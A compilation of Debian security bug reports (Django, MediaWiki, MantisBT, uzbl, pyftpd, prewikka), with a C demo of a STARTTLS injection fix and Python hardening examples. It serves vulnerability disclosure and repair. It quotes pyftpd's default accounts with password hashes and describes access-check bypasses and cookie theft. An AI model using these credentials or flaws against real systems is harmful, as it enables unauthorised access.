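    return c.executed;                  /* 0: the injected command never ran */
}

/* A command that arrives after the handshake (i.e. over TLS) is processed normally. */
int demo_post_tls_command_runs(void)
{
    struct conn c;
    demo_scenario(&c);
    const char *later = "MODE READER\r\n";
    conn_feed(&c, later, strlen(later));
    conn_process(&c);
    return c.executed;                  /* 1 */
}

int main(void)
{
    printf("discarded=%zu executed_at_starttls=%d executed_after_tls=%d\n",
           demo_injected_bytes_discarded(), demo_commands_executed_at_starttls(),
           demo_post_tls_command_runs());
    return 0;
}
```

The same boundary rule applies on the client side of any STARTTLS-style protocol: a client must not act on server data buffered before the handshake either, which is why the CVE-2011-0411 family of fixes touches both directions of the I/O layer.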
Bug#683364: CVE-2012-3442/CVE-2012-3443/CVE-2012-3444: Django 1.3.1 and 1.4.0 security issues
On Thu, Aug 02, 2012 at 12:41:53PM +0200, Raphael Hertzog wrote:
> Hi,
>
> The stable update is ready here. Henri, please test it and report back whether it works well for you.
> http://people.debian.org/~hertzog/packages/python-django_1.2.3-3+squeeze3_i386.changes
>
> I'm ccing the release team to let them know about this security update. Here are the relevant infos:
> - stable is affected (fix in 1.2.3-3+squeeze3)
> - wheezy/unstable is affected (fix in 1.4.1-1)
>
> Please let me know whether I can proceed with the upload (once Henri confirmed that it worked well for him).

Hello Raphael,

After applying these patches my applications in Django and Django itself function normally. I did test this with a normal amount of traffic. Do you think I should try to reproduce the security issues? The patches are pretty much 1:1 with the Django patches.

-- 
Henri Salo
Bug#616673: resolved
Hello,

The upstream bug report https://bugzilla.gnome.org/show_bug.cgi?id=678661 now says status resolved. What is the status of this in Debian?

-- 
Henri Salo
Bug#677018: [debian-mysql] Bug#677018: more information
On Tue, Jun 12, 2012 at 08:57:28AM +0100, Nicholas Bamber wrote:
> Henri,
> I seem to recall that this bug is fixed in 5.5.24 which actually is in testing. The migration is not yet complete and probably still has a week or two to go at the least. But does that change your calculations at all.

What do you mean by calculations? Please close the bug if it is handled. At least running the oneliner in Debian squeeze MySQL-server using the client-package squeeze is not affected.

-- 
Henri Salo
Bug#666269: mediawiki: security release CVE-2012-1578/CVE-2012-1579/CVE-2012-1580/CVE-2012-1581/CVE-2012-1582
Package: mediawiki
Version: 1.18.1-1
Severity: critical
Tags: security

Release announcement: http://lists.wikimedia.org/pipermail/wikitech-l/2012-March/059230.html
Requested CVE-identifiers in here: http://seclists.org/oss-sec/2012/q1/728
CVE-identifiers assigned in here: http://seclists.org/oss-sec/2012/q1/745

CVE-2012-1578 https://bugzilla.wikimedia.org/show_bug.cgi?id=34212
CVE-2012-1579 https://bugzilla.wikimedia.org/show_bug.cgi?id=34907
CVE-2012-1580 https://bugzilla.wikimedia.org/show_bug.cgi?id=35317
CVE-2012-1581 https://bugzilla.wikimedia.org/show_bug.cgi?id=35078
CVE-2012-1582 https://bugzilla.wikimedia.org/show_bug.cgi?id=35315

-- 
Henri Salo
Bug#664990: More information
More information from Timo Warns:

- Only libzip 0.10 is affected.
- Stefan Cornelius has identified the precise commits that introduced the vulnerabilities:
  https://bugzilla.redhat.com/show_bug.cgi?id=802564
  https://bugzilla.redhat.com/show_bug.cgi?id=803028
- As PHP and zipruby include older versions of libzip, they are not affected by the issues.
Bug#662858: CVEs
Detailed summary in here: http://seclists.org/oss-sec/2012/q1/574

A list of CVE-identifiers below (CVE, affected version, upstream bug id, summary):

CVE-2012-1118  MantisBT 1.2.8  10124  array value for $g_private_bug_threshold configuration option allows bypass of access checks
CVE-2012-1119  MantisBT 1.2.8  13816  copy/clone bug report action failed to leave an audit trail
CVE-2012-1120  MantisBT 1.2.8  13656  delete_bug_threshold/bugnote_allow_user_edit_delete access check bypass via SOAP API
CVE-2012-1121  MantisBT 1.2.8  13561  managers of specific projects could update global category settings
CVE-2012-1122  MantisBT 1.2.8  13748  incorrect access checks performed when moving bugs between projects
CVE-2012-1123  MantisBT 1.2.8  13901  SOAP API null password authentication bypass

- Henri Salo
Bug#659379: uzbl: world-readable (and writable!) cookie jar
On Sat, Feb 11, 2012 at 01:25:18PM +0100, Jakub Wilk wrote:
> * Henri Salo he...@nerv.fi, 2012-02-11, 14:11:
> > > $ ls -ld ~/.local/{,share/{,uzbl/{,cookies.txt}}}
> > > drwxr-xr-x 3 user users 4096 Feb 9 23:29 /home/user/.local/
> > > drwxr-xr-x 4 user users 4096 Feb 9 23:29 /home/user/.local/share/
> > > drwxr-xr-x 2 user users 4096 Feb 9 23:29 /home/user/.local/share/uzbl/
> > > -rw-rw-rw- 1 user users 732 Feb 9 23:29 /home/user/.local/share/uzbl/cookies.txt
> > > This allows local users to steal cookies (and tamper with them).
> >
> > Does this security issue have a CVE identifier? I can request one from the oss-security mailing list if an ID hasn't been assigned.
>
> It's been already requested, but not assigned yet AFAICS: http://seclists.org/oss-sec/2012/q1/406
>
> -- Jakub Wilk

Ok. Thank you for the fast reply. Please contact me if you need testing or other help.

- Henri Salo
Bug#659379: [Secure-testing-team] Bug#659379: uzbl: world-readable (and writable!) cookie jar
On Fri, Feb 10, 2012 at 05:09:13PM +0100, Jakub Wilk wrote:
> Package: uzbl
> Version: 0.0.0~git.20100403-3
> Severity: grave
> Tags: security
> Justification: user security hole
>
> $ ls -ld ~/.local/{,share/{,uzbl/{,cookies.txt}}}
> drwxr-xr-x 3 user users 4096 Feb 9 23:29 /home/user/.local/
> drwxr-xr-x 4 user users 4096 Feb 9 23:29 /home/user/.local/share/
> drwxr-xr-x 2 user users 4096 Feb 9 23:29 /home/user/.local/share/uzbl/
> -rw-rw-rw- 1 user users 732 Feb 9 23:29 /home/user/.local/share/uzbl/cookies.txt
>
> This allows local users to steal cookies (and tamper with them).
>
> -- Jakub Wilk

Does this security issue have a CVE identifier? I can request one from the oss-security mailing list if an ID hasn't been assigned.

- Henri Salo
Bug#656388: tucan
CVE-2012-0063 is assigned to this case.
Bug#585773: CVE-2010-2072
CVE-2010-2072 is assigned for this issue.
Bug#585776: CVE-2010-2073
CVE-2010-2073 is assigned for this issue.
Bug#585773: pyftpd: Insecure usage of temporary directory
Package: pyftpd
Version: 0.8.4.6
Severity: critical
Justification: causes serious data loss

*** Please type your report below this line ***

Pyftpd creates its log file in a temporary directory using a predictable name. This allows a local attacker to create a denial-of-service condition and discloses sensitive information to unprivileged users, for example the accounts of other users connecting to the server and the paths they visit.

One should use tempfile.mkstemp (http://docs.python.org/library/tempfile.html#tempfile.mkstemp) or use the /var/log/ directory instead of /tmp/ and use proper file system modes for the log file.

-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages pyftpd depends on:
ii  python          2.5.2-3  An interactive high-level object-o
ii  python-central  0.6.8    register and build utility for Pyt

Versions of packages pyftpd recommends:
ii  python-tk       2.5.2-1  Tkinter - Writing Tk applications

pyftpd suggests no packages.

-- no debconf information
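The two remedies the report names, mkstemp for an unpredictable name and a checked open of a fixed path under a log directory, as an added example that is not pyftpd's own code; it assumes a POSIX system with O_NOFOLLOW, and the directory, file names and log lines are constructed.

```python
import os
import stat
import tempfile

# Added example, not pyftpd's code: two ways to create a log file that a local
# user cannot pre-create, guess or redirect, as the report recommends (POSIX).
def open_temp_log(prefix="pyftpd-", dir=None):
    """Unpredictable name via mkstemp, which uses O_CREAT|O_EXCL and mode 0600,
    so a pre-existing file or link at the path makes the call fail."""
    fd, path = tempfile.mkstemp(prefix=prefix, suffix=".log", dir=dir)
    return os.fdopen(fd, "a"), path

def open_fixed_log(path):
    """Fixed path (e.g. under /var/log/): O_NOFOLLOW rejects a symlink, a new
    file gets mode 0600, an existing one must be ours and private."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    try:
        st = os.fstat(fd)  # inspect the opened fd, not the path, to avoid races
        if not stat.S_ISREG(st.st_mode):
            raise OSError("%s is not a regular file" % path)
        if st.st_uid != os.geteuid():
            raise OSError("%s is owned by another user" % path)
        if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
            raise OSError("%s is group/world accessible" % path)
    except Exception:
        os.close(fd)
        raise
    return os.fdopen(fd, "a")

def log_mode(path):
    return stat.S_IMODE(os.stat(path).st_mode)

def demo():
    """Exercise both helpers in a private dir; returns (tmp mode, fixed mode, refused 0644)."""
    d = tempfile.mkdtemp()
    f, tmp_path = open_temp_log(dir=d)
    f.write("USER alice CWD /pub\n")  # constructed sample log line
    f.close()
    fixed = os.path.join(d, "pyftpd.log")
    with open_fixed_log(fixed) as g:
        g.write("USER bob CWD /incoming\n")
    fixed_mode = log_mode(fixed)
    os.chmod(fixed, 0o644)  # simulate a log someone left world-readable
    try:
        open_fixed_log(fixed).close()
        refused = False
    except OSError:
        refused = True
    return log_mode(tmp_path), fixed_mode, refused
```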
Bug#585776: pyftpd: Default username and password vulnerability
Package: pyftpd
Version: 0.8.4.6
Severity: critical
Justification: root security hole
Tags: security

*** Please type your report below this line ***

File /etc/pyftpd/auth_db_config.py contains:

    passwd = [('test', 'test', 'CY9rzUYh03PK3k6DJie09g=='),
              ('user', 'users', '7hHLsZBS5AsHqsDKBgwj7g=='),
              ('roxon', 'users', 'ItZ2pB7rPmzFV6hrtdnZ7A==')]

These accounts can be used to log in to the FTP server and read arbitrary files and list directories. File perm_acl_config.py lists user permissions.

-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages pyftpd depends on:
ii  python          2.5.2-3  An interactive high-level object-o
ii  python-central  0.6.8    register and build utility for Pyt

Versions of packages pyftpd recommends:
ii  python-tk       2.5.2-1  Tkinter - Writing Tk applications

pyftpd suggests no packages.

-- no debconf information
Bug#585773: Acknowledgement (pyftpd: Insecure usage of temporary directory)
Email from http://packages.debian.org/changelogs/pool/main/p/pyftpd/current/copyright says:

    host mailgw.fmph.uniba.sk[158.195.16.250] said: 550 Previous (cached) callout verification failure (in reply to RCPT TO command)

Best regards,
Henri Salo
Bug#584469: prewikka: Permission security vulnerability
Package: prewikka
Version: 0.9.14-2
Severity: critical
Justification: causes serious data loss

*** Please type your report below this line ***

The prewikka.conf file is world readable and contains the SQL database password used by prewikka. This update makes it readable just by the apache group.

References:
https://dev.prelude-technologies.com/projects/prewikka/repository/revisions/17e38c310410be1b7811152172cda4438936063d
https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00771.html
https://bugs.gentoo.org/show_bug.cgi?id=270056

This has CVE-2010-2058 assigned.

-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/bash
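An added example, not uzbl's or prewikka's code, covering both this report and the uzbl cookie-jar report above: it audits the mode of a secret-bearing file, either from a live path or from an `ls -l` mode string such as -rw-rw-rw-, and restricts it to the owner, or to owner plus one group when a service group such as the web server's must read it. The file name and contents are constructed.

```python
import os
import stat
import tempfile

# Added example, not uzbl's or prewikka's code: audit and fix the permissions of
# a secret-bearing file, from a live path or from the mode column of `ls -l`.
def parse_ls_mode(mode_str):
    """Turn an ls-style mode such as '-rw-rw-rw-' into permission bits."""
    bits = 0
    for i, ch in enumerate(mode_str[1:10]):
        if ch not in "-ST":  # 'S'/'T' mean setuid/setgid/sticky without x
            bits |= 1 << (8 - i)
    return bits

def audit_bits(bits, group_allowed=False):
    """List what is wrong with the permission bits of a secret file.
    group_allowed=True permits group read, e.g. for the web server's group."""
    findings = []
    if bits & stat.S_IROTH:
        findings.append("world-readable")
    if bits & stat.S_IWOTH:
        findings.append("world-writable")
    if bits & stat.S_IRGRP and not group_allowed:
        findings.append("group-readable")
    if bits & stat.S_IWGRP:
        findings.append("group-writable")
    return findings

def audit_path(path, group_allowed=False):
    """Audit a live file; a symlink in place of the file is also flagged."""
    st = os.lstat(path)
    findings = audit_bits(stat.S_IMODE(st.st_mode), group_allowed)
    if stat.S_ISLNK(st.st_mode):
        findings.insert(0, "is a symlink")
    return findings

def harden_path(path, group_allowed=False):
    """Restrict to 0600 (or 0640 for one service group); returns what remains."""
    os.chmod(path, 0o640 if group_allowed else 0o600)
    return audit_path(path, group_allowed)

def demo():
    """Constructed cookie jar with the report's mode; returns (before, after)."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "cookies.txt")
    with open(path, "w") as f:
        f.write("# constructed sample cookie jar\n")
    os.chmod(path, parse_ls_mode("-rw-rw-rw-"))
    return audit_path(path), harden_path(path)
```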